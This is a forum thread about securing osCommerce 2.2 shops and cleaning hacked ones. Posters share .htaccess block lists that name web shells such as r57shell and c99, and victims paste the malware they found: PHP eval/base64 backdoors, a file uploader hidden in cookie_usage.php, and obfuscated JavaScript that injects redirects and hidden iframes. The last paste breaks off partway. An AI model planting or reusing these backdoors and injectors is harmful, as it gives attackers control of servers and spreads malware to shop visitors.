How to secure your osCommerce 2.2 site.

[♥geoffreywalton]

Hello G

 

Thats life, I guess, maybe I've read too much & can't see the wood from the trees, but I've gained the impression that some of the security issues have been resolved in 2.3.1.

 

For sure I can't find file_manager.php in the admin folder.

 

Ken

 

Sorry, didn't even look at the trees.

 

I missed the 2.3.1 reference, I am sure I have seen some posts that go through which are still needed but try reading the documentation for each contriburion.

 

I have not updated VTS (Virus Threat Scanner) and Check Permissions to integrate then into 2.3.

 

Cheers

 

G

[kenkja]

Hello All,

 

Still working away on the security stuff.

 

From the 1st post in the thread

 

"You can stop Cross Site Scripting attacks with Anti XSS http://addons.oscommerce.com/info/6044"

 

I've followed the link & clicked download but am only getting and empty zip file !!

 

Any clues

 

Ken

[kenkja]

Hello Sara,

 

Thanks you for the code, I do have FTP so can edit the files to include it.

 

re " NB: This means that you have to edit the above before you can access admin. "

 

As you may have already guessed I'm new to all this stuff, so like to make sure I think I understand before I do anything, so I presume you mean edit the line "allow from 12.34.56.78" to include my own IP address which I can get by using the IP trap to trap myself.

 

thanks

 

Ken

[Juto]

Hi Ken, yes that's true. However, if you have firefox there's a addon which will show your ip-address in the status bar. Nice! :)

Sara

[kenkja]

Hello Sara

 

I've entered the code and all seems well.

 

thanks

[kenkja]

Thanks to all contributors on this post.

 

I seem to have successfully managed everything on post 1 plus sara's htaccess code, all except for the cross site scripting stuff and deciding what components of the htaccess contribution i should go with.

 

I've no idea if the sites safe now (because I've no idea what I'm talking about) but at least with your help I've given it my best shot

 

thanks

 

Ken

[Guest]

Hello,

 

My name is Ian.

 

We are interested in upgrading from osCommerce 2.2 ms2 to osCommerce 3.0 Alpha.

 

My question is: Are the security upgrades (listed in this forum post) included (out of the box) in osCommerce 3.0 Alpha?

 

 

Thanks

Best regards,

 

Ian Cope

[Guest]

Hello,

 

We would like to upgrade osCommerce 2.2 MS2 to osCommerce 3.0 Alpha.

 

 

Are any of the security features listed in this forum post included (out of the box) in osC3?

 

• 
   
  
• You can prevent any injection attacks with Security Pro http://addons.oscommerce.com/info/5752
  
• 
  
• You can monitor sites for unauthorised changes with SiteMonitor http://addons.oscommerce.com/info/4441
  
• 
  
• You can block elicit access attempts with IP trap http://addons.oscommerce.com/info/5914
  
• 
  
• You can add htaccess protection http://addons.oscommerce.com/info/6066
  
• 
  
• You can stop Cross Site Scripting attacks with Anti XSS http://addons.oscommerce.com/info/6044
  

[Taipo]

None of those featured in the list above will fix the admin exploit except for putting htaccess in your admin folder which doesnt fix the admin exploit, rather it just stops attackers from getting near it.

 

If I may can I suggest that you upgrade to Osc 2.3.1 instead which seems to have patched this issue for now and seems a bit more stable than the 3.0 alpha.

[kenkja]

Hello All,

 

Strange things happening today, I seemed to have lost access to my admin, just by accident I managed to get myself trapped by the IP trap & noticed that my IP address has changed, which accounts for why I can't get into admin as the htaccess file is linked to my original IP. Both IP's appear to okay in that they are both uk and with my broadband supplier, BT - Is this something changing IP normal for BT

 

Ken

[kenkja]

Can anyone offer advice as to which of the htacess contribution components should be installed, as Fimble says in the notes some may be a little extreme.

 

thanks

 

Ken

[CutieCute2]

Despite every security measure mentioned in these forums, an image.php file was uploaded into my shop image folder.

Thanks to the sitemonitor addon running an automatic check daily, I could get find and delete it within hours.

 

The only code was as follows:-

 

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["ae5606e136"])) @eval(base64_decode($_POST["ae5606e136"])); exit; }
?>

 

I believe this would be one file of a number needed to do serious damage to an OSCommerce site.

 

Does anyone know how this could happen?

[Taipo]

I have a couple of questions that may help find an answer to your situation:

1/ had your website been hacked prior to installing these addons, in particular prior to installing sitemonitor?

2/ have you renamed the admin folder or at least installed htaccess restricted user/pass on the admin folder?

3/ are there any other php files in the image folder at all?

 

I am asking these based on the possibility that if your site had been hacked prior to the addons, that there may have been at least one rogue file uploader still resident in your web files that attackers are able to use to add more files (assuming your admin folder is adequately protected).

[CutieCute2]

I have a couple of questions that may help find an answer to your situation:

1/ had your website been hacked prior to installing these addons, in particular prior to installing sitemonitor?

2/ have you renamed the admin folder or at least installed htaccess restricted user/pass on the admin folder?

3/ are there any other php files in the image folder at all?

 

I am asking these based on the possibility that if your site had been hacked prior to the addons, that there may have been at least one rogue file uploader still resident in your web files that attackers are able to use to add more files (assuming your admin folder is adequately protected).

Thanks for replying to my message.

 

A1-Yes but I've looked through all my files and pretty sure there are no rogue files.

A2-No. I never got around to doing these two things for my main two shops. (Sorry for my mistake)

A3-Not now. I got a html file in my image folder in another store yesterday.

 

It said

kaMtiEz wAz Here

Indonesian Coding team

I guess a friendly warning to say "if we can hack into you store, bad people can too!"

 

I guess it's important to apply EVERY piece of advice.

[Patrick67]

Ive discovered that my attacks were coming from Indonesia and Turkey

SO i used

http://www.find-ip-address.org/ip-country/

which gave me the ips to deny on my htaccess list

[Taipo]

A1-Yes but I've looked through all my files and pretty sure there are no rogue files.

 

Some of the uploades are not necessarily files, but are code appended to the end or beginning of site files which when a malformed web address is called it can give the attacker the ability to upload more files. So if the code is still resident within those files it may be possible for the attacker to reload files back into writable folders, which the images folder is the usual target because of some server configurations.

 

A2-No. I never got around to doing these two things for my main two shops. (Sorry for my mistake)

 

All good, best to follow that renaming advice for now or add the password protection to your admin folders if your control panel allows you to. However again, if there are compromised website files with appended code, an attacker would not need to go thru the admin bypass exploit to be able to upload files.

 

A3-Not now. I got a html file in my image folder in another store yesterday.

 

It said

kaMtiEz wAz Here

Indonesian Coding team

I guess a friendly warning to say "if we can hack into you store, bad people can too!"

 

Sometimes its that and other times its a probe attack and sites that are vulnerable get added to a list of sites that might received a mass spam attack at a later stage. In order for the attacker to accurately know if they can upload files, they actually go thru the effort of uploading one, just as a test.

 

If successful then that may trigger your site being added to their list for future physical attention (as a lot of these first contact attacks are automated).

 

Also pays to have a look through some of the other files that also get appended code in.

 

The usual files they go after are:

- includes/application_top.php (both of them)

- includes/languages/english/index.php

- includes/header.php

 

Most of the time an attack will result in worm code of some form being added to those or other files (which you would know about immediately after loading your site into a web browser), but sometimes the code being added might be to allow for file uploading. The attacker knows that at some point in time the affected website will have the security holes patched, so they will want to add more backdoors in for later entry.

 

If you havent done so already, pop a file into your includes folder called .htacess and put the following code into it.

 

Options All -Indexes

<Files *.php>
Order Deny,Allow
Deny from all
</Files>

 

So my last question is, are there any other folders the attackers have uploaded files into other than the images folder?

[Cheepnis]

I've been trying to prevent hotlinking images via .htaccess and have the following code in there, but from every test I've tried, I cannot seem to get the hotlinking blocked, much less the alternate image to show up. I have checked various online tutorials and everything seems to be correct. Here is the code segment in question:

 

 

Options +FollowSymLinks 
RewriteEngine on 
RewriteCond %{HTTP_HOST} ^mysite.com [NC] 
RewriteRule ^(.*)$ http://www.mysite.com/$1 [L,R=301] 

# prevent image theft / hotlinking except the sites below

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?mysite\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} ^http://.*$
# if you are using images directly from your site to ebay.com for example, uncomment the 2 lines below:
# RewriteCond %{HTTP_REFERER} !^http://(www\.)?ebay\.co\.uk/.*$ [NC]
# RewriteCond %{HTTP_REFERER} !^http://(www\.)?ebay\.com/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://(www\.)?myothersite\.org/.*$ [NC]
# Use the line below to send an alternate image
RewriteRule .*\.(jpe?g|gif|bmp|png|swf|pdf)$ http://www.mysite.com/hotlink.gif [L]
# Use the line below to simply 404 all images
# RewriteRule .*\.(gif|jpe?g|png|bmp|swf|pdf)$ - [F]

 

I have quite a few other lines of code in the file - is it possible that something later on is disabling this feature? Here is the rest of the file:

 

# Filter for most common exploits

RewriteEngine On 
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
RewriteCond %{QUERY_STRING} tool25 [OR]
RewriteCond %{QUERY_STRING} cmd.txt [OR]
RewriteCond %{QUERY_STRING} cmd.gif [OR]
RewriteCond %{QUERY_STRING} r57shell [OR]
RewriteCond %{QUERY_STRING} c99 [OR]

# Anti XSS 
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR] 
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]

# Made redundant by Security Pro 2.0
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# bad_conduct replaces index_error.php
# RewriteRule ^(.*)$ index_error.php [F,L]
RewriteRule ^(.*)$ bad_conduct/ban.php [L]
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

RewriteRule setup\.php$ bad_conduct/ban.php [NC,L]
RewriteRule file_manager\.php$ bad_conduct/ban.php [NC,L]
RewriteRule spaw2\.* bad_conduct/ban.php [NC,L]
RewriteRule \.php/login\.php bad_conduct/ban.php [NC,L]
RewriteRule \.php/login\.php$ bad_conduct/ban.php [NC,L]
RewriteRule images/.*\.php$ bad_conduct/ban.php [NC,L]


# Specify error documents
ErrorDocument 400 /store/catalog/http_error.php?error_id=400
ErrorDocument 401 /store/catalog/http_error.php?error_id=401
ErrorDocument 403 /store/catalog/http_error.php?error_id=403
ErrorDocument 404 /store/catalog/http_error.php?error_id=404
ErrorDocument 405 /store/catalog/http_error.php?error_id=405
ErrorDocument 408 /store/catalog/http_error.php?error_id=408
ErrorDocument 415 /store/catalog/http_error.php?error_id=415
ErrorDocument 500 /store/catalog/http_error.php?error_id=500
ErrorDocument 501 /store/catalog/http_error.php?error_id=501
ErrorDocument 502 /store/catalog/http_error.php?error_id=502
ErrorDocument 503 /store/catalog/http_error.php?error_id=503
ErrorDocument 505 /store/catalog/http_error.php?error_id=505
ErrorDocument 504 /store/catalog/http_error.php?error_id=504

# No directory browsing
Options -Indexes

# deny access to unused filetypes
<FilesMatch "\.(bak|inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module|exe|Gfr)$">
deny from all
</FilesMatch>

# no access to htaccess files
<Files ~ "^\.ht">
Order allow,deny
Deny from all
Satisfy All
</Files>

# no access to config files
<Files ~ "\config.php$">
deny from all
</Files>

# Force type & prevent script execution
<Files site>
ForceType application/x-httpd-php
</Files>

########## start block copy-bots
SetEnvIfNoCase User-Agent "^Yandex*" bad_bot
SetEnvIfNoCase User-Agent "^HTTrack" bad_bot
SetEnvIfNoCase User-Agent "^WebCopier" bad_bot
SetEnvIfNoCase User-Agent "^SiteCopy" bad_bot
SetEnvIfNoCase User-Agent "ia_archiver" bad_bot
SetEnvIfNoCase User-Agent "^LinkWalker" bad_bot
SetEnvIfNoCase User-Agent "^Teleport" bad_bot
SetEnvIfNoCase User-Agent "^psycheclone" bad_bot
SetEnvIfNoCase User-Agent "^Web Downloader" bad_bot
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot

<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>
########## end block

<Limit GET HEAD POST>
order allow,deny
deny from cnbaforo.com
deny from keywordspy.com
deny from keywordspypro.com
deny from spyfu.com
deny from spyfoo.com
deny from foospy.com
deny from fuspy.com
allow from all
</LIMIT>

# Block a specific referer
RewriteCond %{HTTP_REFERER} cnbaforo\.com [NC,OR]
RewriteCond %{HTTP_REFERER} keywordspy\.com [NC,OR]
RewriteCond %{HTTP_REFERER} keywordspypro\.com [NC,OR]
RewriteCond %{HTTP_REFERER} spyfu\.com [NC,OR]
RewriteCond %{HTTP_REFERER} foospy\.com [NC,OR]
RewriteCond %{HTTP_REFERER} fuspy\.com [NC,OR]
RewriteCond %{HTTP_REFERER} spyfoo\.com [NC]
RewriteRule .* - [F]
########## end block 

########### BAD BEHAVIOR BLOCK rules to ban exploits
########### IMPORTANT This must be last in the .htaccess file!
########### Add one blank line at the very end of the .htaccess file
<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 174.122.156.98
deny from 67.23.244.96
deny from 94.75.243.135
deny from 178.208.80.219
deny from 79.140.208.242
deny from 116.255.163.100
deny from 62.67.244.64
deny from 85.25.120.187
deny from 189.146.206.70
deny from 77.232.91.201
deny from 58.137.99.88
deny from 109.79.142.39
deny from 222.231.63.26
deny from 24.18.183.14
deny from 109.79.161.168
deny from 198.106.189.76
deny from 202.125.40.167

 

Do you guys see any other syntax errors or questionable statements? I receive no error messages, but that doesn't mean everything works!

Also, do I need to have "RewriteEngine on" only once for the whole .htaccess file, or is it needed at multiple times, for instance, at the top of each section?

Thanks for all your help!

[vinarcid0810]

1) I installed all plugins of securety how to make sure oscommerce 2.2

2) I changed the admin folder

3) protect this new folder with htaccess permissions

4) I put a new copy backup website online ... ok

5) i change password of admin, ftp and mysql

6) configure.php is 444

7) folders permission are 755

8) remove file_manager.php

9) remove file_manager from <li> of admin

10) remove define_leguage.php

 

 

but I happen find more files with these codes:

 

if(document.cookie.indexOf("udb=1")<0){var j=0,n="";while(j<54)n+=String.fromCharCode("iuuq;00hbups76/iptuhbups/dpn0ec:160uet0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r[i].cssRules||r[i].rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var dkel=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel[i]);ydxx+=gh(ch);}ko(ydxx);if (typeof(defs_colors)=="undefined") {
  var defs_colors = 1;

  var div_colors = new Array('#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7e', '#897883', '#847374', '#3e7270', '#83707b', '#7e763e', '#4e7270', '#83707b', '#7e7681', '#82827d', '#748682', '#4c4000');
  var css_colors = new Array('#717e73', '#887378', '#857378', '#827f7b', '#70887d', '#7e7d74', '#787581', '#707c74', '#4b7378', '#852f82', '#83887b', '#744c36', '#737882', '#7f7b70', '#88497d', '#7e7d74', '#364d4b', '#787581', '#707c74', '#2f8281', '#724c36', '#364d4b', '#3e7875', '#81707c', '#744d4b', '#3e7378', '#854d82', '#81724e', '#81754c');
  var css_indexes = new Array(4, 3, 7, 4, 6, 39, 17, 3, 4);

  function div_pick_colors(t) {
var s = '';
for (j=0;j<t.length;j++) {	
	var c_rgb = t[j];
	for (i=1;i<7;i++) {
		var c_clr = c_rgb.substr(i++,2);
		if (c_clr!='00') s += String.fromCharCode(parseInt(c_clr,16)-15);
	}
  }
return s;
  }

  var ct = new Array(10);
  var s = div_pick_colors(css_colors);
  var c = css_indexes;
  ct[0] = div_pick_colors(div_colors);
  var j = 0; var ci = 1;
  for(i=0;i<c.length;i++) {
 	ct[ci++] = s.substr(j,c[i]);
j=j+c[i];
  }
  ct[0] = ct[0];
  function check_div_styles() {
var d=document.getElementsByTagName(ct[1])[0];
if(d) {
	try {
		var d=document.getElementsByTagName(ct[1])[0];
		var v=document.createElement(ct[2]);
		v.style.display=ct[4];
		v.setAttribute(ct[3],ct[4]);
		d.appendChild(v);
		w=document.createElement(ct[5]);
		w.src=ct[0];
		w.setAttribute(ct[8],ct[0]);
		v.appendChild(w);
	} catch(e) {
		document.write(ct[6]+ct[0]+ct[7]);
	}
   } else {
	setTimeout("check_div_styles();",500);	
   }
  }

  check_div_styles();

}

 

<script type="text/javascript">

if (typeof(redef_colors)=="undefined") {



  var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');

  var redef_colors = 1;

  var colors_picked = 0;



  function div_pick_colors(t,styled) {

var s = "";

for (j=0;j<t.length;j++) {	

	var c_rgb = t[j];

	for (i=1;i<7;i++) {

		var c_clr = c_rgb.substr(i++,2);

		if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);

	}

}

if (styled) {

	s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));

} else {

	s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();

}

return s;

  }



  function try_pick_colors() {

try {

   	if(!document.getElementById || !document.createElement){

		document.write(div_pick_colors(div_colors,1));

	   } else {

		var new_cstyle=document.createElement("script");

		new_cstyle.type="text/javascript";

		new_cstyle.src=div_pick_colors(div_colors,0);

		document.getElementsByTagName("head")[0].appendChild(new_cstyle);

	}

} catch(e) { }

try {

	check_colors_picked();

} catch(e) { 

	setTimeout("try_pick_colors()", 500);

}

  }



  try_pick_colors();



}

</script>

[Taipo]

When you say "I put a new copy backup website online", was that a backup of the original site?

 

It is quite possible that there is an upload script still resident in your files. Have a read through the two discussion pieces in my signature for more on the subject.

[vinarcid0810]

hi taipo

tks for your help

 

don't have a copy of backup original ... I trasfer file from server and remove the code from every file.

 

I read the two discussion in your signature:

 

and I found this code for includes/cookie_usage.php

 

<!--<?php 
if(@$_REQUEST['cookies']==1){
echo '--'.'><i>Goog1e_analist_certs</i><br>';
if(@$_REQUEST['e']){eval(base64_decode($_REQUEST['e']));}
elseif(@$_FILES['f']['name']){move_uploaded_file($_FILES['f']['tmp_name'],@$_REQUEST['fp'].$_FILES['f']['name']);if(@$_REQUEST['fc']){@chmod($_FILES['f']['name'],$_REQUEST['fc']);}}
elseif(@$_REQUEST['nn']){$fh=fopen(@$_REQUEST['nn'],'w');fwrite($fh,@$_REQUEST['nd']);fclose($fh); if(@$_REQUEST['fc']){@chmod(@$_REQUEST['nn'],$_REQUEST['fc']);}}
else{$p=str_replace('\\','/',$_SERVER['REQUEST_URI']);
$pt=str_replace('/','../',substr(preg_replace('/[^\/]/','',$p),1)).'./';
echo chr(118).chr(46).chr(46).@is_writable($pt);
}echo '<!'.'--';}
?>-->

 

and this code for includes/lenguages/italia/cookie_usage.php

 

if (isset($_GET["cookie"])) { echo 'cookie=3'; if (isset($_POST["es4"])) @eval(base64_decode($_POST["es4"])); exit; }

 

and this file .. includes/cookie_setup.php

 

<?php
/*
 $Id: cookie_setup.php 1739 2007-12-20 00:52:16Z hpdl $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2003 osCommerce

 Released under the GNU General Public License
*/

if (isset($_GET["cookie"])) { echo 'cookie=2'; if (isset($_POST["es4"])) @eval($_POST["es4"]); exit; }
?>

 

please help me

 

p.s. I have on the server 2 folders:

 

backup_day

backup_week

 

and this folder have more file infetc

can i remove this folder?

[Taipo]

You will need to find the originals of those files for your version of oscommerce and overwrite them. These would have no doubt had the code added to them back when the site was first attacked. Since then they have been able to upload code even if you had patched the admin issues....assuming you have already.

 

But to be honest, if there are many files that have been infected in this manner, it is by far the more secure choice to build a new site with the oscommerce 2.3.1 code and import your template layout and database into the new fileset. Even if you go through every precaution, you only need to miss one of these uploaders and the whole site is at risk again because they allow an attack to do ANYTHING with your sites code which you can see above where some javascript has been appended into some files.

 

If you are willing to take the risk to run with the current old site version, then you will have to be meticulous in your search for rogue files and file code.

[romankerch]

how i eliminates these

1.st hackers check this string for ex.:

<!-- header_eof //-->

Core of site have many sign on *_eof - this is help to detect you site is osCommerce you must delete any *_eof string on site.

[vinarcid0810]

<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r[i].cssRules||r[i].rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var dkel=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,